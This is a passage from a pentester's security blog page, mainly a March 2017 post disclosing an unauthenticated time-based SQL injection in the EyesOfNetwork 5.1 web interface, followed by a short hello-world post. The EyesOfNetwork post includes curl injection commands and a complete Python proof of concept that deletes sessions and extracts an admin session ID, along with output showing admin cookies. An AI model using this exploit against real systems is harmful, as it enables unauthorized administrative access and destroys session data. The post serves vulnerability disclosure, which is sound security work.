<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<title>dba</title>
	
	<meta name="author" content="Dany Bach">

	<!-- Enable responsive viewport -->
	<meta name="viewport" content="width=device-width, initial-scale=1.0">

	<!-- Le HTML5 shim, for IE6-8 support of HTML elements -->
	<!--[if lt IE 9]>
	<script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
	<![endif]-->

	<!-- Le styles -->
	<link href="/assets/resources/bootstrap/css/bootstrap.min.css" rel="stylesheet">
	<link href="/assets/resources/font-awesome/css/font-awesome.min.css" rel="stylesheet">
	<link href="/assets/resources/syntax/syntax.css" rel="stylesheet">
	<link href="/assets/css/style.css" rel="stylesheet">

	<!-- Le fav and touch icons -->
	<!-- Update these with your own images
	<link rel="shortcut icon" href="images/favicon.ico">
	<link rel="apple-touch-icon" href="images/apple-touch-icon.png">
	<link rel="apple-touch-icon" sizes="72x72" href="images/apple-touch-icon-72x72.png">
	<link rel="apple-touch-icon" sizes="114x114" href="images/apple-touch-icon-114x114.png">
	-->

	<link rel="alternate" type="application/rss+xml" title="" href="/feed.xml">
</head>

<body>
	<nav class="navbar navbar-default visible-xs" role="navigation">
		<!-- Brand and toggle get grouped for better mobile display -->
		<div class="navbar-header">
			<button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1">
				<span class="sr-only">Toggle navigation</span>
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
			</button>
			
			<a type="button" class="navbar-toggle nav-link" href="http://github.com/rioru">
				<i class="fa fa-github"></i>
			</a>
			
			
			<a type="button" class="navbar-toggle nav-link" href="http://twitter.com/ddxhunter">
				<i class="fa fa-twitter"></i>
			</a>
			
			
			<a type="button" class="navbar-toggle nav-link" href="mailto:d@nyba.ch">
				<i class="fa fa-envelope"></i>
			</a>
			
			<a class="navbar-brand" href="/">
				<img src="//www.gravatar.com/avatar/2739b0948f46f03e9c65623b8bb69e9e?s=35" class="img-circle" />
				dba
			</a>
		</div>

		<!-- Collect the nav links, forms, and other content for toggling -->
		<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
			<ul class="nav navbar-nav">
				<li class="active"><a href="/">Home</a></li>
				<li><a href="/categories.html">Categories</a></li>
				<li><a href="/tags.html">Tags</a></li>
			</ul>
		</div><!-- /.navbar-collapse -->
	</nav>

	<!-- nav-menu-dropdown -->
	<div class="btn-group hidden-xs" id="nav-menu">
		<button type="button" class="btn btn-default dropdown-toggle" data-toggle="dropdown">
			<i class="fa fa-bars"></i>
		</button>
		<ul class="dropdown-menu" role="menu">
			<li><a href="/"><i class="fa fa-home"></i>Home</a></li>
			<li><a href="/categories.html"><i class="fa fa-folder"></i>Categories</a></li>
			<li><a href="/tags.html"><i class="fa fa-tags"></i>Tags</a></li>
			<li class="divider"></li>
			<li><a href="#"><i class="fa fa-arrow-up"></i>Top of Page</a></li>
		</ul>
	</div>

	<div class="col-sm-3 sidebar hidden-xs" style="">
		<!-- sidebar.html -->
<header class="sidebar-header" role="banner">
	<a href="/">
		<img src="//www.gravatar.com/avatar/2739b0948f46f03e9c65623b8bb69e9e?s=150" class="img-circle" />
	</a>
	<h3 class="title">
        <a href="/">dba</a>
    </h3>
</header>


<div id="bio" class="text-center">
	A generic security blog by a pentester, from Belgium to Paris
</div>


<div id="contact-list" class="text-center">
	<ul class="list-unstyled list-inline">
		
		<li>
			<a class="btn btn-default btn-sm" href="https://github.com/rioru">
				<i class="fa fa-github-alt fa-lg"></i>
			</a>
		</li>
		
		
		<li>
			<a class="btn btn-default btn-sm" href="https://twitter.com/ddxhunter">
				<i class="fa fa-twitter fa-lg"></i>
			</a>
		</li>
		
		
		<li>
			<a class="btn btn-default btn-sm" href="mailto:d@nyba.ch">
				<i class="fa fa-envelope fa-lg"></i>
			</a>
		</li>
		
	</ul>
	<ul id="contact-list-secondary" class="list-unstyled list-inline">
		
		
		<li>
			<a class="btn btn-default btn-sm" href="https://linkedin.com/in/danybach">
				<i class="fa fa-linkedin fa-lg"></i>
			</a>
		</li>
		
		<li>
			<a class="btn btn-default btn-sm" href="/feed.xml">
				<i class="fa fa-rss fa-lg"></i>
			</a>
		</li>
	</ul>
</div>
<!-- sidebar.html end -->

	</div>

	<div class="col-sm-9 col-sm-offset-3">
		<div class="page-header">
  <h1>dba </h1>
</div>



<article class="home">

  <span class="post-date">
    
    March
    28th,
    
    2017
  </span>

  <h2>
    <a href="/pentest/web/2017/03/28/from-unauthenticated-to-root-supervision.html">From unauthenticated to root on a supervision appliance</a>
  </h2>

  <div>
    
    <p>On a recent penetration test, I had to opportunity to test the security of an open-source supervision appliance called <code class="highlighter-rouge">EyesOfNetwork</code>. Multiple vulnerabilities have been found and will be reported in this post.</p>

<h3 id="what-is-eyesofnetwork">What is EyesOfNetwork?</h3>
<p>From the official website:</p>

<blockquote>
  <p>EyesOfNetwork (“EON”) is the OpenSource solution combining a pragmatic usage of ITIL processes and a technological interface allowing their workaday application. EyesOfNetwork Supervision is the first brick of a range of products targeting to assist IT managment and gouvernance. EyesOfNetwork Supervision provides event management, availability, problems and capacity.</p>
</blockquote>

<p>Basically, it is a French supervision solution combining Nagios, Cacti as well as other tools with some of them being hand-made to create a complete appliance to monitor your infrastructure. The solution offers a web interface called <code class="highlighter-rouge">Eonweb</code>.</p>

<h3 id="preparation">Preparation</h3>
<p>For the next tests, we will download the latest iso available on <a href="https://www.eyesofnetwork.com/">https://www.eyesofnetwork.com/</a>. The version downloaded was EyesOfNetwork <code class="highlighter-rouge">5.1</code> and represented the latest version available of the software.</p>

<p>Most of the vulnerabilities found during the assessments and presented in this post have been identified on lower versions as well.</p>

<p>After a default install, if we launch nmap to scan TCP ports, here is the list of ports we find:</p>

<figure class="highlight"><pre><code class="language-bash" data-lang="bash">nmap 192.168.1.161 -p- <span class="c"># The IP address chosen for EON is 192.168.1.161</span>

Starting Nmap 7.40 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2017-03-xx xx:xx CEST
Nmap scan report <span class="k">for </span>192.168.1.161
Host is up <span class="o">(</span>0.00037s latency<span class="o">)</span>.
Not shown: 65530 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http <span class="c"># Used by Eonweb (web interface)</span>
443/tcp  open  https <span class="c"># Used by Eonweb (web interface)</span>
2403/tcp open  taskmaster2000
3306/tcp open  mysql

Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>0.69 seconds</code></pre></figure>

<p>Our goal being a quick way into the system, we’ll search for the low hanging fruit by searching for web vulnerabilities on Eonweb. SSH being difficult to attack due to the possibility of an administrator to change the user accounts passwords at the iso installation and MySQL blocking non-localhost connections.</p>

<h3 id="quick-and-dirty-unauthenticated-sql-injection">Quick and dirty: Unauthenticated SQL injection</h3>
<p>No authentication bypass has been found even if SQL errors could be generated by log in using a backslash character at the end of the username. A SQL injection has been found, however, inside the <a href="https://github.com/EyesOfNetworkCommunity/eonweb/blob/8140aace9493e497e7ca69733079179f62beef7a/logout.php"><em>logout.php</em></a> file, at line 28.</p>

<figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?php</span>
<span class="c1">//logout.php
</span><span class="o">...</span>
<span class="k">if</span><span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s2">"session_id"</span><span class="p">]))</span> <span class="p">{</span>
	<span class="nv">$sessid</span><span class="o">=</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s2">"session_id"</span><span class="p">];</span>
	<span class="nx">sqlrequest</span><span class="p">(</span><span class="nv">$database_eonweb</span><span class="p">,</span><span class="s2">"DELETE FROM sessions where session_id='</span><span class="nv">$sessid</span><span class="s2">'"</span><span class="p">);</span> <span class="c1">// Vulnerable
</span><span class="p">}</span>
<span class="o">...</span>
<span class="cp">?&gt;</span></code></pre></figure>

<p>Obviously, we can control the <code class="highlighter-rouge">session_id</code> cookie because it is not set up inside a session and because of the fact the server doesn’t filter quotes by default.</p>

<p>The injection being inside a <code class="highlighter-rouge">DELETE</code> statement, we have two options: either we exploit it using a blind-based technique by setting up arbitrary sessions and checking which session get deleted (useful for example in the case of a privilege escalation exploit if we have an unprivileged account) <strong>or</strong> we could exploit it using a time-based attack.</p>

<p>From the point of view of an attacker, we’ll take the second option as we do not have credentials on the application.</p>

<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="gp">rioru@zhsk:/tmp$ </span><span class="nb">time </span>curl -s -o /dev/null https://192.168.1.102/logout.php --insecure -b <span class="s2">"session_id=' OR BENCHMARK(1,1)=1 -- -"</span>

real	0m0,091s
user	0m0,064s
sys	0m0,012s
<span class="gp">rioru@zhsk:/tmp$ </span><span class="nb">time </span>curl -s -o /dev/null https://192.168.1.102/logout.php --insecure -b <span class="s2">"session_id=' OR BENCHMARK(100000000,1)=1 -- -"</span>

real	0m1,778s <span class="c"># We can see there that the response time is considerably longer</span>
user	0m0,068s
sys	0m0,008s</code></pre></figure>

<p>The function <code class="highlighter-rouge">SLEEP</code> is not always usable in a <code class="highlighter-rouge">DELETE FROM</code> statement, that’s why <code class="highlighter-rouge">BENCHMARK</code> has been used in this example. <code class="highlighter-rouge">SLEEP</code> is indeed usable only when a table is not empty, we’ll use <code class="highlighter-rouge">SLEEP</code> for our proof of concept as we will need to try to recover the sessions table anyway, but in the final exploit, we’ll have to handle the two possibilities.</p>

<p>What’s particularly interesting is the session’s creation:</p>

<figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?php</span>
<span class="c1">//login.php
</span><span class="o">...</span>
	<span class="c1">// Create session ID
</span><span class="nv">$sessid</span><span class="o">=</span><span class="nb">rand</span><span class="p">();</span>
<span class="nx">sqlrequest</span><span class="p">(</span><span class="nv">$database_eonweb</span><span class="p">,</span><span class="s2">"INSERT INTO sessions (session_id,user_id) VALUES ('</span><span class="nv">$sessid</span><span class="s2">','</span><span class="nv">$usrid</span><span class="s2">')"</span><span class="p">);</span>
<span class="o">...</span>
<span class="cp">?&gt;</span></code></pre></figure>

<p>The monitoring solution is creating their sessions using only <code class="highlighter-rouge">rand()</code> as the session_id, meaning that even if we are forced to do our exploitation via a time-based technique, the session_id could be found in under 11 or 12 seconds with a simple brute force character by character if we set-up a <code class="highlighter-rouge">SLEEP</code> time of 1 second.</p>

<p>Proof of concept:</p>
<noscript><pre>import time
from requests import *
from requests.packages.urllib3.exceptions import InsecureRequestWarning

packages.urllib3.disable_warnings(InsecureRequestWarning)

url = &quot;https://192.168.1.161&quot;

print &quot;[!] Proof of Concept for the Unauthenticated SQL Injection in EyesOfNetwork 5.1 (DELETE statement) - Rioru (@ddxhunter)&quot;

def getTime(page, cookie=&quot;&quot;):
	start = time.time()
	get(url+page, verify=False, cookies=dict(session_id=cookie))
	end = time.time()
	return round(end - start, 2)

# Getting an initial response time to base our next requests around it
initial_time = getTime(&quot;/&quot;) - 0.01
print &quot;[+] The initial request time on %s is %f, getting the number of entries, it could take a while...&quot; % (url, initial_time)
sleep1_time = getTime(&quot;/logout.php&quot;, &quot;rioru&#39; OR SLEEP(1)=1337 -- -&quot;)
if (sleep1_time - initial_time &gt;= 1):
	fcount = round(sleep1_time)
	print &quot;[+] Found %d entries in the [sessions] table, deleting every except one admin&quot; % fcount
else:
	print &quot;[-] The table [sessions] seems empty&quot;
	exit()

# Because of a bug I had when I used DELETE FROM with CASE WHEN, I decided to delete other sessions except the admin one to help and facilitate the exploitation
for i in range(int(fcount)):
	getTime(&quot;/logout.php&quot;, &quot;rioru&#39; OR user_id!=1 LIMIT 1 -- -&quot;)

execTime = getTime(&quot;/logout.php&quot;, &quot;rioru&#39; OR SLEEP(1)=1337 -- -&quot;)
if (execTime - initial_time &gt;= 1):
	count = round(execTime)
	print &quot;[+] Found %d non-admin entries in the [sessions] table, deleting other admin sessions - 1&quot; % (fcount - count)
else:
	print &quot;[-] The table [sessions] seems empty&quot;
	exit()

for i in range(int(count) - 1):
	getTime(&quot;/logout.php&quot;, &quot;rioru&#39; OR 1=1 LIMIT 1 -- -&quot;)

# Get the length
session_length = 0
for i in range(12):
	execTime = getTime(&quot;/logout.php&quot;, &quot;rioru&#39; OR (SELECT CASE WHEN ((SELECT LENGTH(session_id) FROM DUAL ORDER BY session_id LIMIT 1)=&quot;+ str(i+1) +&quot;) THEN SLEEP(1) ELSE 1 END)=1337 -- -&quot;)
	if (round(execTime - initial_time) &gt;= 1):
		session_length = i+1
		break
if (session_length == 0):
	print &quot;[-] Couldn&#39;t find the length of the session_id&quot;
	exit()
print &quot;[+] Found an admin session length: %d, getting the session_id&quot; % session_length

# Get the session_id
print &quot;[+] session_id: &quot;,
session_id = &quot;&quot;
for i in range(session_length):
	for j in range(10):
		execTime = getTime(&quot;/logout.php&quot;, &quot;rioru&#39; OR (SELECT CASE WHEN (SUBSTRING((SELECT session_id FROM DUAL ORDER BY session_id LIMIT 1),&quot;+ str(i+1) +&quot;,1)=&quot;+ str(j) +&quot;) THEN SLEEP(1) ELSE 1 END)=1337 -- -&quot;)
		if (round(execTime - initial_time) &gt;= 1):
			session_id += str(j)
			print str(j),
			break
print &quot;\n[+] final session_id: [%s]&quot; % session_id

# Get the username
execTime = getTime(&quot;/logout.php&quot;, &quot;rioru&#39; OR (SELECT CASE WHEN ((SELECT user_name FROM users WHERE user_id=1)=&#39;admin&#39;) THEN SLEEP(1) ELSE 1 END)=1337 -- -&quot;)
if (round(execTime - initial_time) &gt;= 1):
	print &quot;[+] Username is [admin]&quot;
else:
	print &quot;[-] Username is not admin, brute force necessary&quot;

print &quot;[+] End of the PoC use these cookies to authenticate to Eonweb:&quot;
print &quot;session_id: %s;&quot; % session_id
print &quot;user_name: %s;&quot; % &quot;admin&quot;
print &quot;user_id: %d;&quot; % 1
print &quot;user_limitation: %d;&quot; % 0
print &quot;group_id: %d;&quot; % 1
</pre></noscript>
<script src="https://gist.github.com/rioru/105fb626b5ce046d8f050032da24ad2d.js"> </script>

<p>And here it is in action:</p>

<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="gp">rioru@zhsk:~/perso$ </span>python poc_eon_5.1.py
<span class="o">[</span>!] Proof of Concept <span class="k">for </span>the Unauthenticated SQL Injection <span class="k">in </span>EyesOfNetwork 5.1 <span class="o">(</span>DELETE statement<span class="o">)</span> - Rioru <span class="o">(</span>@ddxhunter<span class="o">)</span>
<span class="o">[</span>+] The initial request <span class="nb">time </span>on https://192.168.1.161 is 0.020000, getting the number of entries, it could take a <span class="k">while</span>...
<span class="o">[</span>+] Found 379 entries <span class="k">in </span>the <span class="o">[</span>sessions] table, deleting every except one admin
<span class="o">[</span>+] Found 18 non-admin entries <span class="k">in </span>the <span class="o">[</span>sessions] table, deleting other admin sessions - 1
<span class="o">[</span>+] Found an admin session length: 9, getting the session_id
<span class="o">[</span>+] session_id:  3 5 3 8 9 8 3 2 7
<span class="o">[</span>+] final session_id: <span class="o">[</span>353898327]
<span class="o">[</span>+] Username is <span class="o">[</span>admin]
<span class="o">[</span>+] End of the PoC use these cookies to authenticate to Eonweb:
session_id: 353898327;
user_name: admin;
user_id: 1;
user_limitation: 0;
group_id: 1;</code></pre></figure>

<p>And using these cookies in a browser/curl, we are corectly authenticated on Eonweb with the <code class="highlighter-rouge">admin</code> account.</p>

<h3 id="go-for-the-kill-privilege-escalation-using-snmp">Go for the kill: Privilege escalation using snmp</h3>
<p><code class="highlighter-rouge">TODO</code></p>

<h3 id="automating-the-attack">Automating the attack</h3>
<p><code class="highlighter-rouge">TODO</code></p>
<ul>
  <li>Metasploit</li>
  <li>
    <table>
      <tbody>
        <tr>
          <td>Attack via sessions or users table</td>
          <td>login directly</td>
        </tr>
      </tbody>
    </table>
  </li>
  <li>BENCHMARK or SLEEP</li>
</ul>

<h3 id="timeline">Timeline</h3>
<ul>
  <li>01st February 2017 - Initial Discovery</li>
  <li>14th March 2017 - Public disclosure of an authenticated SQL injection and a RCE in Eonweb by Sysdream</li>
  <li>27th March 2017 - First contact with the vendor</li>
  <li>28th March 2017 - Created the proof of concept for the exploit</li>
  <li>28th March 2017 - CVE request to DWF</li>
</ul>

<h3 id="final-advisory-incomplete">Final Advisory (incomplete)</h3>
<div class="highlighter-rouge"><pre class="highlight"><code>Title:
======
EyesOfNetwork (EON) 5.1 Unauthenticated SQL Injection in eonweb leading to remote root

Author:
=======
Dany Bach [@ddxhunter, github.io/rioru]

CVE-ID:
=======

OVE-ID:
=======
OVE-20170328-0001

Risk Information:
=================
CVSS Base Score		10.0
CVSS Vector		CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:F/RL:U/RC:C
CVSS Temporal Score	9.7
Overall CVSS Score	9.7

Timeline:
=========
2017-02-01 - Initial Discovery
2017-03-14 - Public disclosure of an authenticated SQL injection and a RCE in Eonweb by Sysdream
2017-03-27 - First contact with the vendor
2017-03-28 - Created the proof of concept for the exploit
2017-03-28 - CVE request to DWF

Status:
=======
Published

Affected Products:
==================
EyesOfNetwork ("EON") 5.1 and older

Vendor Homepage:
================
https://www.eyesofnetwork.com/?lang=en

Details:
========
By exploiting an unauthenticated SQL injection in Eonweb (logout.php), it is possible to gain remote root access to the server using a lack of proper permissions in SNMPd after an authentication using the sessions table.

Vulnerable file:
================
logout.php, Line 28
...
if(isset($_COOKIE["session_id"])) {
	$sessid=$_COOKIE["session_id"];
	sqlrequest($database_eonweb,"DELETE FROM sessions where session_id='$sessid'"); // Vulnerable
}
...

Proof of Concept:
=================
https://gist.github.com/rioru/105fb626b5ce046d8f050032da24ad2d

Fix:
====
</code></pre>
</div>

    
  </div>

</article>


<article class="home">

  <span class="post-date">
    
    March
    7th,
    
    2017
  </span>

  <h2>
    <a href="/general/2017/03/07/mandatory-hello-world.html">Mandatory Hello World</a>
  </h2>

  <div>
    
    <p>Greetings,</p>

<p>My name is <code class="highlighter-rouge">Dany</code>, even if you can call me <code class="highlighter-rouge">Rioru</code>.</p>

<p>I finally decided to launch my blog on <code class="highlighter-rouge">github</code> using <code class="highlighter-rouge">Jekyll</code> to generate my pages. I used to have a <a href="https://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/"><strong>blog</strong></a> but since I created it when I was 17, I decided it was better to start once again from scratch.</p>

<p>This blog will mostly talk about computer security, generally from the point of view of a penetration tester. I’ll share my tips, tricks and thoughts here.</p>

<figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?php</span>
<span class="k">echo</span> <span class="s2">"Hello World"</span><span class="p">;</span>
<span class="cp">?&gt;</span></code></pre></figure>

<p>See you around.
Cheers.</p>

    
  </div>

</article>

<hr/>

<ul class="pager"> 

  
  <li class="previous disabled">
    <a>&larr; Newer</a>
  </li>
  
  
  <li>
    <span class="page_number">Page: 1 of 1</span>
  </li>

  
  <li class="next disabled">
    <a>Older &rarr;</a>        
  </li>
  

</ul>




		<footer>
			<hr/>
			<p>
				&copy; 2017 Dany Bach with <a href="http://jekyllrb.com/">Jekyll</a>. Theme: <a href="https://github.com/dbtek/dbyll">dbyll</a> by dbtek.
			</p>
		</footer>
	</div>

	<script type="text/javascript" src="/assets/resources/jquery/jquery.min.js"></script>
	<script type="text/javascript" src="/assets/resources/bootstrap/js/bootstrap.min.js"></script>
	<script type="text/javascript" src="/assets/js/app.js"></script>
</body>
</html>



